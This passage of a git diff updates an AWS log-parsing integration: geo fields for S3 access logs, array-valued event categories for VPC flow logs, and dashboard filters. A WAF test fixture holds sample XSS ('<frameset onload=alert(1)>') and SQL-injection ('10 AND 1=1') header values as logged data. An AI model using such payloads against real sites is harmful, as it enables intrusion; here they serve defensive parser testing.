cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -415,9 +463,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { @@ -456,6 +504,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" @@ -536,6 +596,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" diff --git a/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml index 4cc5fd2a9d92..5dfba312d613 100644 --- a/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml @@ -103,8 +103,12 @@ processors: ignore_empty_value: true - geoip: field: aws.s3access.remote_ip - target_field: geo + target_field: client.geo if: ctx?.aws?.s3access?.remote_ip != null + - set: + field: geo + copy_from: client.geo + ignore_empty_value: true - set: field: client.user.id value: '{{aws.s3access.requester}}' diff --git a/packages/aws/data_stream/s3access/fields/ecs.yml b/packages/aws/data_stream/s3access/fields/ecs.yml index 2dc9fb59821d..09947a2c1a86 100644 --- a/packages/aws/data_stream/s3access/fields/ecs.yml +++ b/packages/aws/data_stream/s3access/fields/ecs.yml @@ -4,8 +4,6 @@ name: client.ip - external: ecs name: client.user.id -- external: ecs - name: cloud.provider - external: ecs name: ecs.version - external: ecs @@ -23,21 +21,21 @@ - external: ecs name: event.outcome - external: ecs - name: geo.city_name + name: client.geo.city_name - external: ecs - name: geo.continent_name + name: client.geo.continent_name - external: ecs - name: geo.country_iso_code + name: client.geo.country_iso_code - external: ecs - name: geo.country_name + name: client.geo.country_name - description: Longitude and latitude. level: core - name: geo.location + name: client.geo.location type: geo_point - external: ecs - name: geo.region_iso_code + name: client.geo.region_iso_code - external: ecs - name: geo.region_name + name: client.geo.region_name - external: ecs name: http.request.method - external: ecs diff --git a/packages/aws/data_stream/s3access/fields/fields.yml b/packages/aws/data_stream/s3access/fields/fields.yml index e4b8c951d405..834aeabd15ed 100644 --- a/packages/aws/data_stream/s3access/fields/fields.yml +++ b/packages/aws/data_stream/s3access/fields/fields.yml @@ -93,3 +93,24 @@ type: keyword description: | The Transport Layer Security (TLS) version negotiated by the client. +- name: geo.city_name + type: keyword + description: City name. +- name: geo.continent_name + type: keyword + description: Name of the continent. +- name: geo.country_iso_code + type: keyword + description: Country ISO code. +- name: geo.country_name + type: keyword + description: Country name. +- description: Longitude and latitude. + name: geo.location + type: geo_point +- name: geo.region_iso_code + type: keyword + description: Region ISO name. +- name: geo.region_name + type: keyword + description: Region name. \ No newline at end of file diff --git a/packages/aws/data_stream/s3access/sample_event.json b/packages/aws/data_stream/s3access/sample_event.json index 313394b43f7c..72597224fb3e 100644 --- a/packages/aws/data_stream/s3access/sample_event.json +++ b/packages/aws/data_stream/s3access/sample_event.json @@ -13,18 +13,6 @@ "tags": [ "preserve_original_event" ], - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, "cloud": { "provider": "aws" }, @@ -55,6 +43,18 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, + "geo": { + "continent_name": "North America", + "region_iso_code": "US-VA", + "city_name": "Ashburn", + "country_iso_code": "US", + "country_name": "United States", + "region_name": "Virginia", + "location": { + "lon": -77.4728, + "lat": 39.0481 + } + }, "address": "72.21.217.31", "ip": "72.21.217.31" }, diff --git a/packages/aws/data_stream/sqs/fields/ecs.yml b/packages/aws/data_stream/sqs/fields/ecs.yml index 724270921d7d..17aba4ca24ec 100644 --- a/packages/aws/data_stream/sqs/fields/ecs.yml +++ b/packages/aws/data_stream/sqs/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/usage/fields/ecs.yml b/packages/aws/data_stream/usage/fields/ecs.yml index f31088c62a12..6884baffe92c 100644 --- a/packages/aws/data_stream/usage/fields/ecs.yml +++ b/packages/aws/data_stream/usage/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json index a51bb4e14e84..73d5f783e99f 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json @@ -35,13 +35,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2016-10-31T11:37:00.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "outcome": "success", "start": "2016-10-31T11:35:08.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 8855, @@ -97,12 +101,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-10T18:02:14.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "start": "2015-05-10T18:01:16.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -128,12 +136,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-10T18:02:14.000Z", "kind": "event", "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "start": "2015-05-10T18:01:16.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -183,13 +195,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2014-12-14T04:07:50.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", "outcome": "success", "start": "2014-12-14T04:06:50.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 4249, @@ -278,13 +294,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2014-12-14T04:07:50.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", "outcome": "failure", "start": "2014-12-14T04:06:50.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 4249, @@ -355,13 +375,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-29T16:32:22.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", "outcome": "success", "start": "2015-05-29T16:30:27.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 336, @@ -450,13 +474,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-29T16:32:22.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "outcome": "failure", "start": "2015-05-29T16:31:34.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 336, diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json index 5b7f5c755a91..5b47f22a27f5 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json @@ -39,13 +39,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "outcome": "success", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 568, @@ -116,12 +120,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -153,12 +161,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json index 2abc453081ee..aab712c0ee93 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json @@ -45,13 +45,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2021-12-20T11:38:17.000Z", "kind": "event", "original": "5 64111117617 eni-069xxxxxb7a490 89.160.20.156 10.200.0.0 50041 33004 17 52 1 164000066 1640000297 REJECT OK vpc-09676f97xxxxxb8a7 subnet-02d645xxxxxxxdbc0 i-0axxxxxx1ad77 1 IPv4 89.160.20.156 10.200.0.80 us-east-1 use1-az5 - - AMAZON CLOUDFRONT ingress 1", "outcome": "failure", "start": "1975-03-14T03:34:26.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 1, diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json index f90c95bec95b..bc9b1592f331 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json @@ -20,12 +20,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2022-12-14T14:55:28.000Z", "kind": "event", "original": "2 428961148399 eni-0e0bf7be352692297 - - - - - - - 1671029698 1671029728 - NODATA", "start": "2022-12-14T14:54:58.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml index 4f04b099e8ee..d607c64eb3bf 100644 --- a/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml @@ -20,10 +20,10 @@ processors: description: 'The `message` field is no longer required if the document has an `event.original` field.' - set: field: event.type - value: connection + value: [connection] - set: field: event.category - value: network + value: [network] - drop: if: 'ctx.event?.original.startsWith("version") || ctx.event?.original.startsWith("instance-id")' - dissect: diff --git a/packages/aws/data_stream/vpcflow/fields/ecs.yml b/packages/aws/data_stream/vpcflow/fields/ecs.yml index a4ce35d1fa59..378811fd396c 100644 --- a/packages/aws/data_stream/vpcflow/fields/ecs.yml +++ b/packages/aws/data_stream/vpcflow/fields/ecs.yml @@ -78,8 +78,6 @@ external: ecs - name: source.as.organization.name external: ecs -- name: source.as.organization.name - external: ecs - name: source.bytes external: ecs - name: source.geo.city_name diff --git a/packages/aws/data_stream/vpcflow/fields/fields.yml b/packages/aws/data_stream/vpcflow/fields/fields.yml index 0d85135f5d3b..6d3d8ed255b8 100644 --- a/packages/aws/data_stream/vpcflow/fields/fields.yml +++ b/packages/aws/data_stream/vpcflow/fields/fields.yml @@ -93,4 +93,3 @@ type: keyword description: | The ID of the sublocation that contains the network interface for which traffic is recorded. If the traffic is not from a sublocation, the field is removed. - diff --git a/packages/aws/data_stream/vpcflow/sample_event.json b/packages/aws/data_stream/vpcflow/sample_event.json index 735058bd9352..cfd45f10dea1 100644 --- a/packages/aws/data_stream/vpcflow/sample_event.json +++ b/packages/aws/data_stream/vpcflow/sample_event.json @@ -49,8 +49,12 @@ "kind": "event", "start": "2016-10-31T11:35:08.000Z", "end": "2016-10-31T11:37:00.000Z", - "type": "connection", - "category": "network", + "type": [ + "connection" + ], + "category": [ + "network" + ], "outcome": "success" }, "aws": { diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json index b6e03615ed73..7d4ef0c9d792 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json @@ -214,7 +214,7 @@ "Host": "localhost:1989", "User-Agent": "curl/7.61.1", "bar": "10 AND 1=1", - "xssfoo": "\u003cframeset onload=alert(1)\u003e" + "xssfoo": "" } }, "rule_group_list": [ @@ -248,7 +248,7 @@ "conditionType": "XSS", "location": "HEADER", "matchedData": [ - "\u003c", + "<", "frameset" ] } @@ -272,7 +272,7 @@ "action": "BLOCK", "category": "web", "kind": "event", - "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"<\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "type": [ "access", "denied" diff --git a/packages/aws/data_stream/waf/fields/ecs.yml b/packages/aws/data_stream/waf/fields/ecs.yml index 03d036b8a4ba..19fc554bf597 100644 --- a/packages/aws/data_stream/waf/fields/ecs.yml +++ b/packages/aws/data_stream/waf/fields/ecs.yml @@ -2,8 +2,6 @@ name: source.address - external: ecs name: source.ip -- external: ecs - name: cloud.provider - external: ecs name: ecs.version - external: ecs diff --git a/packages/aws/docs/elb.md b/packages/aws/docs/elb.md index a998b929e91b..5a1892769109 100644 --- a/packages/aws/docs/elb.md +++ b/packages/aws/docs/elb.md @@ -232,7 +232,9 @@ An example event for `elb` looks as following: "version": "8.0.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", diff --git a/packages/aws/docs/route53.md b/packages/aws/docs/route53.md index 2564ef0aa87c..17aee59b98a0 100644 --- a/packages/aws/docs/route53.md +++ b/packages/aws/docs/route53.md @@ -306,7 +306,7 @@ An example event for `route53_resolver` looks as following: "data_stream": { "namespace": "default", "type": "logs", - "dataset": "aws.route53_public_logs" + "dataset": "aws.route53_resolver_logs" }, "dns": { "question": { diff --git a/packages/aws/docs/s3.md b/packages/aws/docs/s3.md index a0284ccac0b8..99eaeb87ba3e 100644 --- a/packages/aws/docs/s3.md +++ b/packages/aws/docs/s3.md @@ -80,6 +80,13 @@ to learn about customer base and understand Amazon S3 bill. | aws.s3access.user_agent | The value of the HTTP User-Agent header. | keyword | | aws.s3access.version_id | The version ID in the request, or "-" if the operation does not take a versionId parameter. | keyword | | client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| client.geo.city_name | City name. | keyword | +| client.geo.continent_name | Name of the continent. | keyword | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.geo.country_name | Country name. | keyword | +| client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | | client.ip | IP address of the client (IPv4 or IPv6). | ip | | client.user.id | Unique identifier of the user. | keyword | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | @@ -114,7 +121,7 @@ to learn about customer base and understand Amazon S3 bill. | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | -| geo.region_iso_code | Region ISO code. | keyword | +| geo.region_iso_code | Region ISO name. | keyword | | geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | @@ -181,18 +188,6 @@ An example event for `s3access` looks as following: "tags": [ "preserve_original_event" ], - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, "cloud": { "provider": "aws" }, @@ -223,6 +218,18 @@ An example event for `s3access` looks as following: "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, + "geo": { + "continent_name": "North America", + "region_iso_code": "US-VA", + "city_name": "Ashburn", + "country_iso_code": "US", + "country_name": "United States", + "region_name": "Virginia", + "location": { + "lon": -77.4728, + "lat": 39.0481 + } + }, "address": "72.21.217.31", "ip": "72.21.217.31" }, diff --git a/packages/aws/docs/vpcflow.md b/packages/aws/docs/vpcflow.md index 128ed7913d0d..2cdcf70f6381 100644 --- a/packages/aws/docs/vpcflow.md +++ b/packages/aws/docs/vpcflow.md @@ -244,8 +244,12 @@ An example event for `vpcflow` looks as following: "kind": "event", "start": "2016-10-31T11:35:08.000Z", "end": "2016-10-31T11:37:00.000Z", - "type": "connection", - "category": "network", + "type": [ + "connection" + ], + "category": [ + "network" + ], "outcome": "success" }, "aws": { diff --git a/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json b/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json index f87decc844e0..8212b0238e69 100644 --- a/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json +++ b/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json @@ -9,7 +9,29 @@ "description": "Logs AWS VPC Flow Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.vpcflow" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.vpcflow" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json b/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json index 58e89e9f8270..3521b6f76fc4 100644 --- a/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json +++ b/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json @@ -3,7 +3,29 @@ "description": "Logs AWS ELB Access Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.elb_logs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.elb_logs" + } + } + } + ], "query": { "language": "kuery", "query": "" @@ -23,7 +45,7 @@ "attributes": { "description": "", "layerListJSON": "[{\"alpha\":1,\"id\":\"19047c4c-18d7-4aec-b0ce-98de2828244d\",\"label\":\"Hits\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"type\":\"EMS_TMS\",\"lightModeDefault\":\"road_map\"},\"style\":{},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"1d457cd4-01be-4f96-95fd-af4ac535ebea\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyGlobalQuery\":true,\"geoField\":\"source.geo.location\",\"id\":\"1e82f50f-424a-4718-905b-ad45db14db62\",\"requestType\":\"point\",\"resolution\":\"COARSE\",\"type\":\"ES_GEO_GRID\",\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"style\":{\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Blues\",\"field\":{\"label\":\"count\",\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3}},\"type\":\"DYNAMIC\"},\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"label\":\"count\",\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":32,\"minSize\":4},\"type\":\"DYNAMIC\"},\"lineColor\":{\"options\":{\"color\":\"#167a6d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]", - "mapStateJSON": "{\"center\":{\"lat\":50.97903,\"lon\":13.666},\"filters\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"aws.elb_logs\"},\"type\":\"phrase\",\"value\":\"elb\"},\"query\":{\"match\":{\"data_stream.dataset\":{\"query\":\"aws.elb_logs\",\"type\":\"phrase\"}}}}],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":3.9,\"settings\":{\"autoFitToDataBounds\":false}}", + "mapStateJSON": "{\"center\":{\"lat\":50.97903,\"lon\":13.666},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":3.9,\"settings\":{\"autoFitToDataBounds\":false}}", "title": "ELB Requests Geolocation [Logs AWS]", "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" }, diff --git a/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json 